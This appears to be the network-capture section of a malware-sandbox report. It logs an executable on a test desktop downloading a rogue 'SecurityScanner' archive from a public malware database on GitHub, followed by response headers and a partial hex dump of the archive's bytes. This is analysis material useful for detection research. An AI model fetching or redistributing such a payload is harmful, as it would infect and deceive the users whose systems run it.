                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                63192.168.2.549764185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:57 UTC34595OUTGET /Endermanch/MalwareDatabase/master/rogues/SecurityScanner.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:58 UTC34595INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 2284722
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "8a7bbc160d440a17d6ac37c40c91f7c318eb644a20006201447ba221ef497c63"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 3592:AB9E:ECB2F5:FC3511:63359366
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:58 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6973-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455918.530056,VS0,VE492
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 9d8e41f6ee745cb0cf0b886b99fc260036b21527
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:58 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:51:58 UTC34596INData Raw: 50 4b 03 04 14 00 01 00 08 00 c9 8a 34 3e 77 97 5c 9c f0 db 22 00 00 8e 23 00 1e 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 53 65 63 75 72 69 74 79 53 63 61 6e 6e 65 72 2e 65 78 65 20 c7 72 e1 36 7f a9 32 1e aa 4e 82 70 0b 31 2e cf b3 50 6d 0d 20 9a b2 e8 00 31 77 b5 12 cd 92 fd 0a 1a 82 2a 11 9a 37 0d df bd 74 5d be 55 96 56 66 a5 9f 8a de 75 d2 1a 74 ea 76 98 8c bf 2a d2 8b 29 78 4f 1c 3b 0f 14 ad 60 ae fc 26 16 76 c7 9f 81 44 64 89 8b 06 0a cc e9 04 69 e3 a6 b7 84 c9 38 6e 09 76 f4 9b fe 5e 0f 1c 1d 47 ba 7f bf 9e b9 2f a9 65 19 0c 6a 56 27 35 3e e4 ba 4e dd a8 59 0d d0 1a ad a0 77 f5 33 8e 92 27 e1 e4 1f 7b d1 f6 f3 a8 6f 8b 2f 48 b9 e8 fe 5e af af 36 90 9f 27 43 a1 0b fa f4 8d 03 7a 80 ec 8b 67 c5 62 82 4b a0 be 4c a5 3f 34 e3 c4 65 9d 91 84 50 de 33
                                                                                                                                                Data Ascii: PK4>w\"#Endermanch@SecurityScanner.exe r62Np1.Pm 1w*7t]UVfutv*)xO;`&vDdi8nv^G/ejV'5>NYw3'{o/H^6'CzgbKL?4eP3
                                                                                                                                                2022-09-29 12:51:58 UTC34612INData Raw: d0 69 36 f4 99 b6 d2 6a d7 f6 c5 ef e0 93 6b 92 8b 4c 8f dd 4b 1a aa 52 42 10 79 4f c8 4a 6a a7 d0 6a b5 80 32 a5 47 9d 42 41 4b df 84 95 74 3d 10 55 c3 e9 7e 68 60 34 de 88 47 c6 0f 96 0a 34 85 4c c1 bf 1c 31 54 4e 93 cb 7c bd 3d d3 37 7f 4c 70 0e 9e c8 53 c0 1d f1 08 c4 78 14 a5 8d be 25 26 57 55 94 0a 0a 39 73 58 74 2f 42 16 49 e1 8b 1c 4a 5c 8f bd cd 28 a5 5b bd fe e3 3e b4 2e 05 b4 67 b5 a5 37 c6 ca a7 57 fa da 46 c3 a0 03 59 0d ba f5 1c 7f 34 43 4c b5 ed 40 f6 ad 71 1b fb 7b 8c d8 74 dc 29 a4 81 2a 00 b4 14 e1 26 2e de 7d 86 d5 e3 fc 61 44 5c 89 d8 4e 6d 83 39 75 b9 c3 81 4f 7d a1 c3 29 78 b0 ee 87 6d ba ed 0c 2e c2 da 56 ae bc 56 7f c1 16 57 6b ad d7 93 16 d3 4a e1 79 c6 fa 3f 9f ee b1 b6 a9 83 0b d3 74 07 d3 b2 19 5e 6a ef 3a 92 02 0d ba fc 1f ae
                                                                                                                                                Data Ascii: i6jkLKRByOJjj2GBAKt=U~h`4G4L1TN|=7LpSx%&WU9sXt/BIJ\([>.g7WFY4CL@q{t)*&.}aD\Nm9uO})xm.VVWkJy?t^j:
                                                                                                                                                2022-09-29 12:51:58 UTC34628INData Raw: be 5d c4 78 6a 20 c6 66 59 4d e4 33 e1 b1 38 70 e0 27 28 56 41 49 a0 96 bf f8 94 69 63 95 39 90 74 ed 04 c0 a9 5d 32 8e b1 c0 50 3f 68 d4 d4 4e 33 0a 1b 33 2c eb 9d 55 16 33 a1 6f ac e6 03 33 91 a9 c3 ae cb 3b 0a 30 03 11 31 74 65 f6 c3 13 81 91 36 02 f8 ea 3e 54 77 16 96 a9 17 0a 96 b2 c6 ca 86 da 37 37 fb 90 5d 4f cb 75 0f 2b f6 fe f2 3e 0c 30 14 35 12 42 31 a9 53 a4 2b f4 c6 06 38 dc 99 d1 dd d4 49 24 9d 3a e6 68 57 0c b1 1f 6b 00 bb 1f 79 70 7e 9e 74 1b 2b e1 02 38 f5 4d 2c 96 05 e7 1f b0 e6 45 56 9a 5d 6b b9 00 7e 80 f4 b0 2c 3c cb ae b0 03 6b db 73 91 d1 30 79 99 5d 06 b3 e9 57 3e 18 44 d2 1b 95 c6 93 ef 3c 9c 67 46 95 53 19 4d 36 aa 95 c8 cc 69 87 90 25 2c 7c ef 89 f9 03 f9 de 57 bf dc b8 0a da 2d 3c 6d 4d 75 45 ef 03 7f 17 5f 1b bf 8f b9 50 b6 23
                                                                                                                                                Data Ascii: ]xj fYM38p'(VAIic9t]2P?hN33,U3o3;01te6>Tw77]Ou+>05B1S+8I$:hWkyp~t+8M,EV]k~,<ks0y]W>D<gFSM6i%,|W-<mMuE_P#
                                                                                                                                                2022-09-29 12:51:58 UTC34644INData Raw: ec db a4 40 56 40 b0 40 41 f4 0e 65 a1 4a d7 5e 2c 84 09 6b b0 ca a4 7d ea e6 8e 56 41 d1 c8 5a bf e2 56 b7 f9 aa 83 76 66 f3 66 1e ee 27 c2 f4 c6 31 8d ad 7a 35 ef 41 6f de 80 2f 79 44 a5 3a fe c6 10 74 3d b0 09 7a cc e8 32 98 c3 9a 35 20 f3 ea 12 ca d7 61 5b f0 31 b6 70 f3 b1 24 8c fd c3 94 8f 48 0e cf 2b 6b c8 65 d9 37 19 4d 24 f4 b3 bc ff 86 77 83 98 c9 c4 cf 24 b6 ef d5 2b 25 d1 44 dc 84 1f 2e 27 50 42 91 16 67 5d c7 fc fe 76 ec e3 95 05 82 dc 9d 30 96 25 42 f0 33 3f cd 9b 96 fd 9e 5f 3e d5 a8 69 6d af c6 42 ff b0 77 08 11 d4 1a b8 1b e4 84 63 a6 85 4f fc 94 07 98 25 88 42 bc 09 00 54 8e d6 7c f3 ff 7f 09 f3 57 3c 51 46 12 d9 23 aa 82 7f f7 cc 57 38 92 4b 8f 12 57 ae 69 5c d9 28 32 c6 9d 62 1f 64 41 f0 94 fe c2 44 f4 6f a2 4f d0 ce 83 89 0b cb 02 78
                                                                                                                                                Data Ascii: @V@@AeJ^,k}VAZVvff'1z5Ao/yD:t=z25 a[1p$H+ke7M$w$+%D.'PBg]v0%B3?_>imBwcO%BT|W<QF#W8KWi\(2bdADoOx
                                                                                                                                                2022-09-29 12:51:58 UTC34660INData Raw: e7 b9 f9 c2 7b 15 c1 41 e4 66 0d 32 35 01 4d ef 8d 67 70 f4 e3 d9 4b d7 64 c8 d6 2e 43 92 c9 bd d5 59 c5 d7 8f 8a b8 53 ff 50 eb c0 4b 95 d3 de 41 c9 9e 7a f6 a3 9e bb 29 d2 74 8e 19 e2 45 5e e9 52 d1 5c 74 c0 43 d4 f9 a1 ec e3 2e 69 3d bc be d8 f4 d8 c6 3e 10 fd 01 e5 4b 6f c2 72 45 e4 b7 5f 0e da 74 50 71 74 12 fa 57 b1 73 1b 52 ef c0 7a 3f af ab 4f 36 33 fa 6e a5 7e de 0d af 62 d7 bb 5c 75 6a a1 26 21 c2 61 67 c7 5e 05 3b c3 ca d7 09 d3 2c f6 24 72 4d e8 a1 72 70 3c 15 1b 52 82 31 ec 36 e2 9f c6 40 de 53 62 f7 28 59 ce 80 81 35 71 b6 08 b3 17 6b 58 1b 6e e5 1f 62 9f f8 2a 69 ce e3 41 62 d3 82 9e 15 38 3b 6b 1d 0a 59 38 a8 59 14 f5 87 76 cd 51 65 30 42 96 75 d8 28 8d 65 47 c9 55 c0 04 5d ed 85 64 ca 59 27 94 b0 50 36 32 74 57 25 d5 a6 45 26 ee 7c a5 74
                                                                                                                                                Data Ascii: {Af25MgpKd.CYSPKAz)tE^R\tC.i=>KorE_tPqtWsRz?O63n~b\uj&!ag^;,$rMrp<R16@Sb(Y5qkXnb*iAb8;kY8YvQe0Bu(eGU]dY'P62tW%E&|t
                                                                                                                                                2022-09-29 12:51:58 UTC34676INData Raw: 12 8b b1 53 94 32 73 8c 5c 0d 5b 3c 87 1a be 51 67 45 01 ef 76 c3 69 80 be 2c 86 57 3c b2 8f d1 fa cc 55 d1 ca a5 06 f6 78 f2 e4 f3 48 67 5e 26 9d 1f 11 ea 72 c1 b5 76 84 72 1f 6c cd 1a c2 92 b3 49 08 21 f3 9a b2 44 0e 72 fd b3 5b b7 99 16 d9 f4 d4 b1 88 28 bd 12 cf 20 a8 52 46 c0 26 aa 6f fb 87 d8 2f 0a 70 d7 5f 33 a5 0e 89 36 6e d3 e6 bd c8 90 62 ad ea a6 d5 1d d0 e3 01 25 7e 79 18 7b e9 9b 60 ca b9 81 66 d0 53 89 0d 04 7b 0c 01 f1 a2 4c 5b 20 51 e3 bd 23 04 18 9a 7a 1f f4 df a3 1c d0 8c 2b bc 47 d7 81 9b ac 6e dc c7 00 9b 90 f6 39 b8 51 00 97 ca 49 0e b1 75 c2 c5 cd d5 c3 35 60 b8 3e f3 d1 ff f8 ed e8 3f 32 fd 5b db 5a eb ac a8 40 f3 1d 77 98 d5 12 4e bb de 00 98 72 a1 12 bb 83 f8 ac 8f 97 7f 3a 90 96 13 7c 06 d1 8f bf 38 16 80 94 f1 d1 57 d1 91 39 20
                                                                                                                                                Data Ascii: S2s\[<QgEvi,W<UxHg^&rvrlI!Dr[( RF&o/p_36nb%~y{`fS{L[ Q#z+Gn9QIu5`>?2[Z@wNr:|8W9
                                                                                                                                                2022-09-29 12:51:58 UTC34692INData Raw: d7 a2 d3 6b 86 31 35 49 49 4d c7 89 0e ee ab 0e 2e 39 52 a6 b4 6c 6d ae 99 6d 89 54 6c 34 e1 f8 b3 ec 41 d8 9d 2d 76 2e 7f 94 36 c6 d3 a9 44 81 2f 71 0a f1 67 56 ae dd c0 ed 0f a1 f0 da 27 d1 f1 21 6b 31 3f 71 e7 0b a1 9f ec b4 2d 34 90 e3 51 54 e5 03 4d 3f 85 0e ee dd d8 63 db b5 7d 32 55 31 ac 46 b0 03 af f3 2d cc c7 71 e9 73 29 24 7a 05 ec 70 9c 28 16 3e 74 4b 95 58 8f 0d b9 0a ca 04 9c f7 7c 19 89 73 3e dd c3 7c 40 b8 1f 8a 74 20 79 fc 35 72 f7 3d 0f ee 9c b9 ef 8b 1b 0f c9 98 d4 ca 68 e3 dd 3c a5 17 e2 8d e7 a5 10 0e 21 5a 77 0f ba ba 84 2a 72 33 8e e7 ed 69 cc 90 68 52 3d 42 2e 1b dc 79 e5 73 2c 27 d2 14 69 55 87 fb da cf b2 8e ee 70 3c d3 e7 5c d2 7d 23 e8 58 96 8f 49 2b 1f 1b 9c cc cc b2 29 56 1f 62 36 0d cb 4b f5 a5 31 26 13 19 2d a1 af f7 5b 1b
                                                                                                                                                Data Ascii: k15IIM.9RlmmTl4A-v.6D/qgV'!k1?q-4QTM?c}2U1F-qs)$zp(>tKX|s>|@t y5r=h<!Zw*r3ihR=B.ys,'iUp<\}#XI+)Vb6K1&-[
                                                                                                                                                2022-09-29 12:51:58 UTC34708INData Raw: 5b 58 7b 34 cc 41 0b 3e 5a 79 c3 65 43 fe d3 54 85 c4 c8 96 88 b4 ee e5 b8 c8 14 d0 f8 81 1a eb ba 56 d2 76 be 32 1c 58 60 54 91 ed ce cf 73 1e 38 4c ec d4 30 aa 11 b7 e2 f7 9c cb f6 36 b0 7d 9d 72 4e 73 51 f0 1d 30 2b 16 33 18 42 99 53 e3 aa 66 26 a9 b9 9a 1e 57 f3 09 c6 0e cf 32 15 5a 62 dd 46 c1 52 95 29 e4 79 1d 21 f5 1d 22 d8 e1 8d 1f a0 6f a3 14 66 e6 f1 dc ac 44 88 b8 5d 22 cb ab 98 1f bd e6 e3 18 8f c3 67 e2 43 f5 4a 6e d3 12 9c c7 10 c7 f1 9d 4a c5 b0 01 2a e3 c9 99 c1 0b e2 04 78 1a f6 3e a8 4b 72 0f d9 b1 1f 99 af bf 66 5b 24 e3 3a da d0 54 13 35 63 d6 97 e6 10 32 f6 57 4c 57 d8 91 1d 50 84 6d 63 23 34 57 e5 c6 59 3a 94 d7 7c d8 c8 78 bc 8e 64 d1 a2 ff 4a 09 8a 93 c4 ce db 23 1c 1c 5e 15 2f d9 81 8a 6c b1 72 72 53 32 5b 14 b3 80 8a da 3e 3c b3
                                                                                                                                                Data Ascii: [X{4A>ZyeCTVv2X`Ts8L06}rNsQ0+3BSf&W2ZbFR)y!"ofD]"gCJnJ*x>Krf[$:T5c2WLWPmc#4WY:|xdJ#^/lrrS2[><
                                                                                                                                                2022-09-29 12:51:58 UTC34724INData Raw: 92 42 d2 63 a8 c4 69 58 b2 f0 37 6e f9 54 01 c8 a0 d0 b7 5e 64 ed 7e 02 0f c4 8b 8d 9e 90 e0 0e df 68 b0 a8 53 74 92 61 40 49 68 02 66 94 78 a0 ee a1 96 a7 e9 6c ca 74 3a d1 62 4a 03 ec 10 8b f9 c5 25 a7 7b d5 dc fc 88 73 58 b8 99 55 cc 29 ae 00 bf 7d 94 9b ab 24 4a f1 d8 ff d9 e9 52 d9 d1 eb 4b 71 ac c1 79 88 d1 c8 52 01 d9 b4 c7 04 17 17 73 b1 c1 45 d8 60 ba 66 59 8c e4 bd 1d 71 09 43 dd 89 f2 46 08 c3 0a 43 24 85 d0 1c 0c 78 8a ca f8 38 46 fa 95 67 87 77 26 82 03 57 6f 72 04 1d 7c 17 3d ff 12 bd 94 2a 56 03 a8 d1 f5 bd 14 b1 cb c1 9f fd 88 cd 34 ac ee e2 fd cf 2c f8 47 04 e0 af 59 d9 9d 25 1d 6e 2c 9e d7 78 e4 61 d4 a5 6e a9 3f f0 23 1f df a6 0f 66 39 f9 a5 b9 7d 2c 9f 39 78 c7 11 f5 5e f5 bf de 7a 11 4a 3c d7 08 74 71 a7 3a 71 f1 16 2e 56 5d 81 44 ab
                                                                                                                                                Data Ascii: BciX7nT^d~hSta@Ihfxlt:bJ%{sXU)}$JRKqyRsE`fYqCFC$x8Fgw&Wor|=*V4,GY%n,xan?#f9},9x^zJ<tq:q.V]D
                                                                                                                                                2022-09-29 12:51:58 UTC34740INData Raw: 26 31 09 b6 6c ba 1b b9 07 ec d2 98 1c 90 d8 65 31 af be 88 f7 b3 7a 23 f3 a9 16 fe 58 ee c8 3a 75 06 09 e9 c5 b7 01 57 09 f9 64 3e fa 3f 2b 87 05 4b 3b d9 d2 57 29 50 36 bc 3a 68 66 b4 bd 2f ab d0 e2 d0 58 1c 36 49 f1 d3 06 10 b1 56 a4 fc 67 55 2e 8b 21 31 51 a8 90 7a c2 f5 08 b8 7c 61 d5 21 20 4d 6e d9 e3 eb 71 9a f6 01 ce 2b 0d e7 6c 3a f0 1a 91 4e cc 04 48 e2 1d a9 41 b4 aa 01 36 3f 9c 81 83 09 d6 68 be 6e ed c6 fc 1d 79 85 7e 48 65 86 5b 5c 46 88 fd b7 f2 30 ed 16 c3 96 15 2f 41 49 c1 e2 71 91 40 e1 b4 d6 3c b1 10 5d 9a d6 88 a0 1f d6 10 51 6c 3b f9 42 2f 7c 19 34 50 30 b0 74 13 c4 ee aa 00 c1 31 33 d3 2d ea 65 2c 79 49 3c 7e 4d ba 12 3f d7 0a 4b ed e7 be 37 4b 4f f2 5e a7 db b7 8a 84 6d f5 76 8a 6c 90 04 76 d3 9b a3 26 ec 42 d2 18 52 76 c5 b7 cc c7
                                                                                                                                                Data Ascii: &1le1z#X:uWd>?+K;W)P6:hf/X6IVgU.!1Qz|a! Mnq+l:NHA6?hny~He[\F0/AIq@<]Ql;B/|4P0t13-e,yI<~M?K7KO^mvlv&BRv
                                                                                                                                                2022-09-29 12:51:58 UTC34756INData Raw: 0f f6 55 99 86 6d 27 80 90 14 f2 47 b2 98 41 20 7a f2 fe 59 a0 33 90 da fa 34 82 94 f2 63 e0 22 35 5b 0b 46 8a 48 17 86 47 08 a0 40 34 05 9a b3 53 25 65 dc e4 be 63 96 d5 10 aa 48 29 0a 8b bc 36 31 f3 b2 b8 49 73 6e e7 5d 9b 9c 13 2d ed fb dc 2a 33 ae 35 6e a3 98 9f d3 fe 44 22 88 5b ce 67 f5 f1 3c eb 2b c2 04 10 a7 ee aa 62 43 68 67 47 9f 59 53 79 84 2e c5 49 ab 4a d8 49 40 15 6e 35 49 dd 4c 53 e4 d2 3f 09 e6 06 27 fb 4b e9 8c 0a f9 e6 d2 58 fe 52 31 87 ab a4 26 60 db 79 e3 9a 73 6f 1c 41 8c bb 7a 5d 89 ed ea e8 17 71 99 f3 66 da f5 83 a5 79 6f 5c ff e1 e2 d7 7f 75 af 46 82 56 0a ce f8 a8 a1 f4 a4 03 48 73 89 c8 be c8 03 c3 07 3e a6 38 2f 02 5e 7d fe e1 ec cc 4b 0f 8d 9b af 14 e1 e5 92 db a6 41 e8 50 8e a7 2f e4 67 f1 ea 20 22 5e 4b 8f c6 c5 c9 aa 74 50
                                                                                                                                                Data Ascii: Um'GA zY34c"5[FHG@4S%ecH)61Isn]-*35nD"[g<+bChgGYSy.IJI@n5ILS?'KXR1&`ysoAz]qfyo\uFVHs>8/^}KAP/g "^KtP
                                                                                                                                                2022-09-29 12:51:58 UTC34772INData Raw: 35 14 24 cc f8 66 a3 e8 00 a0 a4 c5 2d 15 b6 29 fe 51 f9 81 f4 94 37 9a 07 7d 46 d4 f5 81 06 dd aa 2b 9d 67 31 f7 6a f5 1a 3c b9 cb c5 fc c7 16 2f c3 a3 e6 e2 37 6c c7 7a 82 59 9a 56 c0 f1 bb 4c 3a 8d ca 8e 9c 58 d5 06 24 87 fb ab c7 19 51 b0 c8 c8 e7 5d f7 d6 e5 4a 20 29 40 bd 5a b3 b2 82 ce 01 5f 66 5a db de 73 9e 64 73 ec 6b 9c ec 1e c7 c6 97 6e 30 ee a7 f8 9b ea 93 3a 3c 84 5b 31 99 c8 04 2c f5 95 7c f1 ba c2 7b 8b 39 6c 3c 39 57 7a ce 79 c1 24 a0 85 3e 5b 37 40 e3 88 ec 1c 54 b6 76 15 bb d4 81 b2 ae 5f 9d a9 2d d1 c6 38 e9 42 ab 23 c5 bc ff 89 e9 52 8c ef 25 ef e2 7d b6 bf aa 68 01 be e1 39 6e bf 01 cb 5e 6c 9c 5a a9 c3 6b cc f1 85 02 75 a8 ae d0 e2 d5 6f f2 b9 99 92 3b 3e 56 f4 a5 9c 86 62 1b 72 11 c1 db d6 19 95 c0 51 d0 ff b3 74 e0 97 59 e3 07 af
                                                                                                                                                Data Ascii: 5$f-)Q7}F+g1j</7lzYVL:X$Q]J )@Z_fZsdskn0:<[1,|{9l<9Wzy$>[7@Tv_-8B#R%}h9n^lZkuo;>VbrQtY
                                                                                                                                                2022-09-29 12:51:58 UTC34788INData Raw: cb c7 4f d8 fd 0f ff 01 29 06 99 0e 35 20 aa 27 2a e5 80 45 48 5a 5c 5c 1f 14 b8 17 ac 0f 8e 0a b3 24 65 80 8d 81 96 43 c1 37 80 5b 59 f9 d7 53 af c2 7f 48 2b 52 d2 f4 25 85 15 d9 99 1d 3d 46 25 99 a2 5e d0 cc da f2 d9 77 77 10 0d dc 1e e4 33 eb 34 4a 23 70 0c d2 db 88 76 15 8b 76 fa aa 0c 02 00 0c 1e 81 59 1f 1d 67 af 6c 45 66 8f d8 6b 75 80 66 1b c6 51 9a 68 22 15 60 11 6d 63 fc 35 b1 45 e9 88 75 f5 4c 4a 7b 72 bb 9b f4 57 4f 52 b8 b6 f8 e3 e8 19 0c 10 d9 07 4d e7 e8 f6 11 bf f2 0f ca 01 f2 eb 54 f2 df 36 d9 22 c0 bb b6 d2 fd 49 4b 90 91 4b 3c ee f4 26 f3 62 95 c7 e6 15 e7 6c 90 dd 17 a7 d1 d1 0a 2f c8 65 20 c5 c6 62 52 8a 23 2f 5b 3b 4f e8 dd 22 54 6d bc 3e 1b ec ec 28 80 03 27 bd de f0 00 22 7f e0 af 91 ba ef b8 14 6d 72 d9 24 d6 e4 65 28 a4 ef 4c 7f
                                                                                                                                                Data Ascii: O)5 '*EHZ\\$eC7[YSH+R%=F%^ww34J#pvvYglEfkufQh"`mc5EuLJ{rWORMT6"IKK<&bl/e bR#/[;O"Tm>('"mr$e(L
                                                                                                                                                2022-09-29 12:51:58 UTC34804INData Raw: 1c 3b 7b fa fa a7 7a 3f 35 00 96 9d c9 46 0d 14 58 10 8a 57 bd 55 7b b3 ea 2d a6 46 ee b5 b0 4f c2 5d 28 31 31 c2 b4 55 5a 2e c7 6d 01 84 67 19 87 29 63 15 76 b9 3c de 4f 80 d7 8d ad c8 9c c0 1b a3 2b 69 76 be 17 f2 af c9 f5 0b 41 15 93 4b 24 d4 94 80 77 e5 e8 f7 55 38 84 ce 5c 7a f9 b4 cf 6f 52 f0 56 a8 10 ac b5 a5 ea 68 ff dd c7 0c 12 9a 0f 2f 36 86 73 fe a0 44 df 22 25 5d d4 7b a3 a6 65 66 ee 8a 2c 89 9d db 87 98 d5 7a 06 b0 92 81 87 80 a7 54 06 b5 c8 27 6f d3 00 36 23 69 c2 8d 9b 01 6d 55 6f ad 4e eb 06 70 eb 7f 26 f2 57 bb b1 f3 e5 6b 78 19 e3 27 a3 4a 8c 01 a6 98 ce d6 3b f0 a3 e2 20 b1 a1 9d 2b c7 57 ce 54 45 00 15 de d9 5e a1 e5 88 e7 f3 b3 07 fb 67 f9 a2 7a 0c 97 3d dc 14 d0 db 67 8a ca ea 70 ee ec 6b 29 6a 04 c2 e5 56 4a a7 c7 a3 91 62 84 7e 4d
                                                                                                                                                Data Ascii: ;{z?5FXWU{-FO](11UZ.mg)cv<O+ivAK$wU8\zoRVh/6sD"%]{ef,zT'o6#imUoNp&Wkx'J; +WTE^gz=gpk)jVJb~M
                                                                                                                                                2022-09-29 12:51:58 UTC34820INData Raw: 3b ec 70 05 50 8a ae 74 59 02 67 4d 81 bf a8 9e fe 57 21 93 47 c5 89 8e 4a 56 74 c0 98 f5 5b c4 48 9b 78 b7 85 37 7a 54 2b e6 e4 ee 53 0e 11 60 46 f4 fb 96 cf 32 50 21 91 d9 74 e7 b2 5b 9b fa 87 6b 3a 88 6b b9 54 49 3c 96 22 ee 50 fb e9 ba fc 3f f4 41 a6 8d 4b 9f 56 b5 a0 2f 80 b2 87 fe ac 97 31 13 8e 25 40 43 c6 93 3c 58 08 13 22 3a b2 25 d8 ad b9 02 9f a3 71 7f e4 5b a1 a4 da e7 7c 49 a6 13 e9 54 65 5c 37 d8 6b 4c 0b 75 87 2e 21 77 44 57 97 65 58 de 3c d4 b0 5e 29 f5 df 9d c6 64 1b 7e 0d a4 70 26 8a 08 8e 7a 30 d7 ff ca 83 87 6b d2 e7 78 80 29 8d 85 8b 5e 30 2a db 6d 4b 44 d3 1b a4 32 bd e3 44 32 5e 0b 92 e8 3a 02 66 34 58 04 62 09 be 03 bf e3 f8 ef 89 dd 75 e6 79 7e b1 c8 6f 9d 0f 63 2d f3 40 40 dd 9f 79 7d 12 6c 0f fe 4c ca aa b6 ff d8 63 e4 1d 62 63
                                                                                                                                                Data Ascii: ;pPtYgMW!GJVt[Hx7zT+S`F2P!t[k:kTI<"P?AKV/1%@C<X":%q[|ITe\7kLu.!wDWeX<^)d~p&z0kx)^0*mKD2D2^:f4Xbuy~oc-@@y}lLcbc
                                                                                                                                                2022-09-29 12:51:58 UTC34836INData Raw: 2c bb 75 92 36 c4 33 f4 9c 84 fb 51 81 3d 3b db 09 ef 90 c6 20 01 78 71 79 d4 1f db 87 00 b1 b0 9b e0 3b 23 3b 86 4a d0 50 15 af 46 fe 43 26 9e 99 aa ac e7 c4 66 2b 0b 86 d1 ad ac ca 73 53 41 de 02 b9 30 24 fc 76 f5 2f 26 af be ce e3 cf 49 a0 03 93 c6 83 2e 81 9b b9 13 4b 23 50 d3 5b 81 d2 e4 6a 2c 4d ac 1a 26 e6 5a 7e ad 28 87 c6 9d 68 90 af d3 62 6f d0 ee d6 79 bc 52 9c 77 9d 39 13 8f ee e2 26 8b 00 6d 33 5f db 37 83 16 1c b8 70 d3 ad 5a c9 0f c7 5d fe db ec b9 ce 6f bb 90 c5 d7 e1 1d 00 af d3 f5 bd 87 3d a7 34 68 6b 94 82 09 91 e0 50 bd 65 6c 33 4c 81 28 32 38 8e 26 ab 09 dd 85 2d d5 74 ba 38 80 e3 76 13 7d 3b d9 f6 0a a0 8d 41 33 88 b4 ae 8b 69 c6 0c 46 17 38 29 12 13 08 aa c1 8a 9b 02 4d 9f cc ba 03 0a 42 34 3e af 7d e8 7a 3e 6e 48 44 b4 20 d0 f6 ea
                                                                                                                                                Data Ascii: ,u63Q=; xqy;#;JPFC&f+sSA0$v/&I.K#P[j,M&Z~(hboyRw9&m3_7pZ]o=4hkPel3L(28&-t8v};A3iF8)MB4>}z>nHD
                                                                                                                                                2022-09-29 12:51:58 UTC34846INData Raw: 63 fe c2 de 3f 07 85 a7 10 99 c4 84 69 37 c2 9f 77 cb 7d d1 4c 45 ff 5b 39 c4 c5 12 61 cd ae 9f 3f c7 63 2c 35 35 2d 5c b0 41 3a 22 20 e9 ae 5f f1 bb be b4 c4 78 52 cb 1a d3 0c 86 b6 b0 94 3b 1c 5b 5e 75 bb a5 79 33 f0 bd 78 8d cc 84 67 04 0b 67 2c 52 b8 f0 e9 b5 06 12 fc 76 30 1d 8a 20 ba 37 af 9d 80 28 e8 5d 49 23 a7 ed cb 8e 15 83 01 f4 17 d3 4b d3 4e 78 96 45 94 a8 15 bc 66 84 9e 1f 36 b9 84 1c e5 e3 be 4d 52 eb 52 e0 e1 cd b4 a6 bb f1 8d db 4b a5 9f da 16 1d ac df b5 45 ea 4f 8f db 2f 59 b9 0d 60 08 1e 9b b5 c3 1f e3 07 a3 7b 50 43 af 8d ce 91 ce 6a 41 e3 da 93 d7 fa 2d 97 52 e3 04 78 95 dd 7f 0b 16 c9 75 a6 ae 00 8c 52 29 ef 5e cb 7c 28 42 c9 4e 1a 94 81 60 1b 10 4c 78 3a 5a 50 dd 86 37 32 80 fe e6 a4 d2 f3 57 83 4e a5 7c 26 f6 c0 6b 45 c1 fe 34 7b
                                                                                                                                                Data Ascii: c?i7w}LE[9a?c,55-\A:" _xR;[^uy3xgg,Rv0 7(]I#KNxEf6MRRKEO/Y`{PCjA-RxuR)^|(BN`Lx:ZP72WN|&kE4{
                                                                                                                                                2022-09-29 12:51:58 UTC34862INData Raw: 31 b4 71 7e be d2 5a 82 ef f9 04 2b 98 0d b5 da ec 36 0b 2b 50 32 58 74 2a e5 a4 67 b7 4b bb 0a ac 2c 28 2b c3 c6 e2 d1 fe 6c 70 c8 e9 85 bf 9c 57 75 0a 6a db f0 5a 87 e7 20 5b 89 7b fb d5 58 55 2f 29 ec bd 6e b8 dd 7e 35 9e 24 01 22 e1 a1 78 b5 28 96 32 08 ec aa b4 68 a4 cb 58 e4 9b f0 3a 6f 64 38 8c 41 1b 9f 3a e0 3f 3c 87 c2 91 2e ae e1 4a 14 43 26 62 bd cd ce 2e 55 28 c3 2a 3e 4c ee 4e e9 79 da 8e 10 5a 4f 46 72 f7 3f f7 2f 2e 48 fb bc 93 b3 d2 8b e5 48 66 91 c6 42 bc a5 20 bd 3d e7 83 29 32 be 0a b6 25 61 de df 36 37 d3 d2 ff 9e 6a a2 ec 30 02 8e 99 8a 63 c0 20 c0 58 72 54 b4 0b 26 44 ef 88 dc 54 11 ad 68 79 e4 5f 83 9c 5c 49 1f 16 f6 d8 35 20 93 a0 b5 5f 34 31 6e 36 d3 81 a1 40 c1 59 be d1 9a aa 6a 87 79 c7 e0 9f 34 ec d3 e7 6a 41 6c 23 cc 2d 49 85
                                                                                                                                                Data Ascii: 1q~Z+6+P2Xt*gK,(+lpWujZ [{XU/)n~5$"x(2hX:od8A:?<.JC&b.U(*>LNyZOFr?/.HHfB =)2%a67j0c XrT&DThy_\I5 _41n6@Yjy4jAl#-I
